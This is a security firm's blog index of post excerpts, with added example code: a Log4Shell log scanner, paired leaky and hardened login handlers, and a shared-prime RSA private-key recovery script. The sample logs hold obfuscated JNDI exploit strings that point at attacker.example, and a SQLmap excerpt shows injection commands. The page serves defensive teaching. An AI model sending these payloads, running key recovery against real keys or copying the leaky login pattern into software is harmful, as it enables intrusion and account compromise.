18 posts in the “Blog” category

Our team researches and documents bleeding-edge security concepts and hacking techniques. This blog explores these topics and more to keep you informed.

Are Your Cybersecurity Investments In Tools and Services Paying Off?

By Joedy Glenn | January 14, 2022 | Blog

Finding, implementing, and supporting cybersecurity tools and services within an organization can be a daunting task for a company of any size. There is no shortage of cybersecurity tools and services available to address just about every area of

Why Critical Vulnerabilities Like Log4Shell Will Continue to Surface

By Cornel du Preez | December 14, 2021 | Blog

What is Log4Shell? Log4Shell (CVE-2021-44228) is a critical vulnerability in Log4j 2, the Java logging library maintained by the Apache Logging Services project (versions 2.0-beta9 through 2.14.1 are affected). The vulnerability allows remote code execution (RCE) by a malicious actor
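
The exploit string that triggers Log4Shell is a `${jndi:...}` lookup in any logged field, and attackers wrap it in nested lookups (`${lower:j}`, `${::-j}`, `${env:NOPE:-j}`) to slip past naive pattern matches. The following detector is an added example, not code from the original post: it collapses those obfuscation lookups offline and then checks for the JNDI lookup that remains. The log lines are constructed for the example, and the set of lookups it unwraps (`lower`, `upper`, and the `:-` default-value form) is an assumption about which obfuscations are worth handling, not a complete model of Log4j's lookup grammar.

```python
import re

# Constructed sample access-log lines (not taken from the original post).
SAMPLE_LOGS = [
    '10.0.0.5 - - [10/Dec/2021:10:00:01 +0000] "GET / HTTP/1.1" 200 "-" "Mozilla/5.0"',
    '10.0.0.6 - - [10/Dec/2021:10:00:02 +0000] "GET / HTTP/1.1" 200 "-" "${jndi:ldap://attacker.example/a}"',
    '10.0.0.7 - - [10/Dec/2021:10:00:03 +0000] "GET / HTTP/1.1" 200 "-" "${${lower:j}ndi:${lower:l}dap://attacker.example/a}"',
    '10.0.0.8 - - [10/Dec/2021:10:00:04 +0000] "GET / HTTP/1.1" 200 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://attacker.example/b}"',
    '10.0.0.9 - - [10/Dec/2021:10:00:05 +0000] "GET / HTTP/1.1" 200 "-" "${${env:NOPE:-j}${upper:n}di:dns://attacker.example/c}"',
    '10.0.0.10 - - [10/Dec/2021:10:00:06 +0000] "GET /?q=${date:yyyy} HTTP/1.1" 200 "-" "curl/7.68"',
]

# ${lower:x} / ${upper:x} evaluate to x with its case changed; for matching we only need x.
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^{}]*)\}", re.IGNORECASE)
# ${anything:-x} evaluates to x when the lookup fails, e.g. ${::-j} or ${env:NOPE:-j}.
_DEFAULT_LOOKUP = re.compile(r"\$\{[^{}]*:-([^{}]*)\}")
# What remains after unwrapping: a JNDI lookup, whatever the scheme (ldap, rmi, dns, ...).
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalize_lookups(text: str, max_rounds: int = 16) -> str:
    """Collapse innermost obfuscation lookups, innermost first, until the text stops changing."""
    for _ in range(max_rounds):
        collapsed = _DEFAULT_LOOKUP.sub(r"\1", _CASE_LOOKUP.sub(r"\1", text))
        if collapsed == text:
            break
        text = collapsed
    return text


def is_jndi_probe(line: str) -> bool:
    """True if the line carries a JNDI lookup once obfuscation is stripped."""
    return _JNDI.search(normalize_lookups(line)) is not None


def scan(lines):
    """Return (line_index, normalized_line) for every line carrying a JNDI lookup."""
    return [(i, normalize_lookups(line)) for i, line in enumerate(lines) if is_jndi_probe(line)]


if __name__ == "__main__":
    for idx, norm in scan(SAMPLE_LOGS):
        print(f"line {idx}: {norm}")
```

Two caveats for anyone running this over real logs: a lookup whose value comes from the target's environment (for example `${sys:...}` or `${env:...}` with a real variable) cannot be unwrapped offline, so a miss here is not proof of a clean log, and a hit only tells you a probe arrived, not that the application was vulnerable or that the lookup resolved.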

User Enumeration in a Production Environment – Credential Stuffing 101

By Ryan Fisher | July 19, 2021 | Blog

Ah yes, credential stuffing! Almost as common as Thanksgiving stuffing, yet as distasteful as Black Friday shopping. Credential stuffing is especially effective when it’s coupled with user enumeration. The likelihood of user enumeration attacks
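
User enumeration usually comes from a login handler that answers differently for an unknown username than for a bad password, either in its message or in how long it takes (skipping the password hash for unknown users is a common timing leak). The pair of handlers below is an added example, not code from the original post, showing the leaky pattern beside a hardened one that returns one message and always performs a hash computation. The user store, salts and passwords are constructed for the example.

```python
import hashlib
import hmac

PBKDF2_ROUNDS = 50_000  # assumption for the example; tune to your hardware in production


def _hash(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)


# Constructed user store: username -> (salt, pbkdf2 hash). One real user only.
_ALICE_SALT = b"constructed-salt-for-alice"
USERS = {"alice": (_ALICE_SALT, _hash("correct horse battery", _ALICE_SALT))}

# A dummy record so unknown usernames cost the same as known ones.
_DUMMY_SALT = b"constructed-dummy-salt"
_DUMMY_HASH = _hash("never-a-valid-password", _DUMMY_SALT)


def login_leaky(username: str, password: str):
    """Vulnerable: distinct messages, and no hash work at all for unknown users (fast path)."""
    if username not in USERS:
        return (False, "unknown user")
    salt, stored = USERS[username]
    if _hash(password, salt) != stored:
        return (False, "wrong password")
    return (True, "ok")


def login_hardened(username: str, password: str):
    """Hardened: same message for both failure cases, and a hash is always computed."""
    salt, stored = USERS.get(username, (_DUMMY_SALT, _DUMMY_HASH))
    hash_ok = hmac.compare_digest(_hash(password, salt), stored)
    ok = hash_ok and username in USERS  # dummy record must never log anyone in
    return (ok, "ok" if ok else "invalid username or password")


if __name__ == "__main__":
    for fn in (login_leaky, login_hardened):
        print(fn.__name__, fn("bob", "x"), fn("alice", "x"), fn("alice", "correct horse battery"))
```

The hardened handler still needs rate limiting and anti-automation in front of it; constant responses only remove the oracle that makes credential stuffing cheap to target, they do not stop the guessing itself.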

Hacking 101: Getting Your Bearings

By Rob Waltman | August 19, 2021 | Blog

Network security is a unique field of IT, and unlike many other IT fields, it seems almost hostile to anyone new and looking to learn about pentesting. I’ve heard several statements that boil down to “I want to learn how to be a pentester but I

Dangling DNS: Low Hanging Fruit with Severe Consequences

By Ryan Fisher | April 28, 2021 | Blog

In this blog we discuss dangling DNS and how, if left unresolved, an attacker can use it to mar the reputation of a victim company. First let’s start by defining the Domain Name System (DNS). The Domain Name System is an assortment of databases that

Exploiting Bring Your Own Device (BYOD)

By Anthony Ralston | February 12, 2021 | Blog

Bringing your own device (BYOD) is a common practice within many organizations and due to COVID-19, the adoption of BYOD has expanded. The belief that software or applications can protect data from bad actors or negligence does not always take

Command and Control Through AWS S3 Buckets

By Anthony Ralston | January 13, 2021 | Blog

Many organizations leverage AWS as their cloud computing platform. Allowing access to and from their AWS resources is critical for workloads to operate uninterrupted. This means that an AWS VPC is often seen as a logical extension of the corporate

Introduction to Hardware Hacking: Part 2

By Anthony Ralston | December 2, 2020 | Blog

In the last blog, we discussed the components that are used in hardware hacking, the discovery phase and how to pull information off a device leveraging a UART port and the Das U-Boot boot loader. However, in some cases we aren’t able to

Introduction to Hardware Hacking: Part 1

By Anthony Ralston | November 13, 2020 | Blog

There are many devices out there that store information in different ways and unfortunately, not all of them take security into account. With the advent of the Internet of Things (IoT), device manufacturers are publishing devices faster than ever,

Is your penetration testing vendor just trying to sell you products and services?

By Brent Brackin | September 17, 2020 | Blog

Not too long ago, while working at another company, I was subjected to a presentation by a paid speaker at our annual sales kickoff meeting. Since I was heavily focused on security consulting solutions for my client base, our leadership assumed

Shifting Security Left: A Practical Guide

By Cornel du Preez | November 5, 2020 | Blog

Application security practitioners often preach about the importance of shifting security left in the software development life cycle (SDLC). The reason this catch-phrase so easily resonates with leadership is simple: if it’s possible to identify

Securing SuiteCRM on Apache

By Anthony Ralston | September 2, 2020 | Blog

SuiteCRM is a popular open-source Customer Relationship Management (CRM) application. I took some time to review the code and a basic installation of the application on a vanilla Ubuntu build. I found good security practices within the application itself,

PHP Type Juggling

By Anthony Ralston | August 12, 2020 | Blog

Type juggling is expected PHP behaviour when loose comparisons (==) are used. However, it can be abused to subvert intended operations. In this blog, we will discuss why type juggling occurs, what the potential impacts are, and why we should

Our Response to COVID-19

By Cornel du Preez | April 13, 2020 | Blog

Abricto Security understands that all industries feel the impact of COVID-19 and we’re here to help. Our team is shifting our operating procedures to accommodate fully remote consultations and assessments. Here is how we plan to do so: We will

Defining the Secure Software Development Lifecycle (SSDLC)

By Cornel du Preez | June 30, 2020 | Blog

Here at Abricto Security, we believe that application penetration tests only reveal the tip of the iceberg. Specifically, if we conduct an application penetration test and we find that it’s riddled with vulnerabilities, the remediation effort

SQLmap Cheatsheet and Examples

By Cornel du Preez | April 2, 2020 | Blog

Target the http://target.server.com URL using the "-u" flag: sqlmap -u 'http://target.server.com' Specify POST requests by specifying the "--data" flag: sqlmap -u

Extracting Private Keys From Public Keys Generated With Weak Random Number Generators

By Cornel du Preez | March 19, 2020 | Blog

Public key cryptography is heavily utilized in modern implementations of SSH. An administrator generates a key pair, a public key and a private key, and the private key proves the key holder’s identity during authentication, while the session data itself is protected by symmetric keys negotiated in the handshake. Using this method is favored
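
A weak random number generator tends to hand the same prime to more than one RSA key, and two moduli that share a prime can both be factored with a single gcd, without any factoring work at all. The block below is an added example of that shared-prime attack, not code from the original post and not necessarily the exact method the post describes: it takes a small batch of "public keys", finds a common factor by pairwise gcd, derives each affected private exponent and decrypts a message with it. The moduli are constructed from known Mersenne primes so the example needs no RNG of its own; the one "weak" prime reused across two keys stands in for the RNG failure.

```python
from math import gcd

E = 65537  # common public exponent

# Constructed demo primes (known Mersenne primes), small enough to read and large enough to be realistic in shape.
P = 2**61 - 1
Q = 2**89 - 1
R = 2**107 - 1
S = 2**127 - 1
T = 2**31 - 1

# Constructed "public keys": the weak generator produced P twice, so two moduli share it.
N_WEAK_1 = P * Q
N_WEAK_2 = P * R
N_GOOD = S * T  # unrelated key with no factor in common


def shared_prime_attack(moduli, e=E):
    """Return {n: (p, q, d)} for every modulus that shares a prime with another modulus in the batch."""
    recovered = {}
    for i, n in enumerate(moduli):
        for m in moduli[i + 1:]:
            g = gcd(n, m)
            if 1 < g < min(n, m):  # nontrivial common factor: both keys are now factored
                for k in (n, m):
                    p, q = g, k // g
                    d = pow(e, -1, (p - 1) * (q - 1))  # private exponent from the factorisation
                    recovered[k] = (p, q, d)
    return recovered


def decrypt_with_recovered_key(ciphertext: int, n: int, recovered: dict) -> int:
    """Textbook RSA decryption using the private exponent recovered for modulus n."""
    _, _, d = recovered[n]
    return pow(ciphertext, d, n)


if __name__ == "__main__":
    rec = shared_prime_attack([N_WEAK_1, N_WEAK_2, N_GOOD])
    print("compromised moduli:", [hex(n)[:18] + "..." for n in rec])
    msg = 123456789
    ct = pow(msg, E, N_WEAK_1)
    print("recovered plaintext:", decrypt_with_recovered_key(ct, N_WEAK_1, rec))
```

Real deployments run this as a batch gcd over millions of collected public keys rather than a quadratic pairwise loop, but the result is the same: a key whose prime appears in any other key is fully compromised, and the only fix is to regenerate it on a system with a properly seeded RNG.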

Password List Generation Using CUPP

By Cornel du Preez | February 7, 2020 | Blog

In many of our network and web application penetration tests, we come across login portals that aren’t protected by anti-automation controls. Essentially, this allows us to launch unrestricted dictionary attacks on previously identified
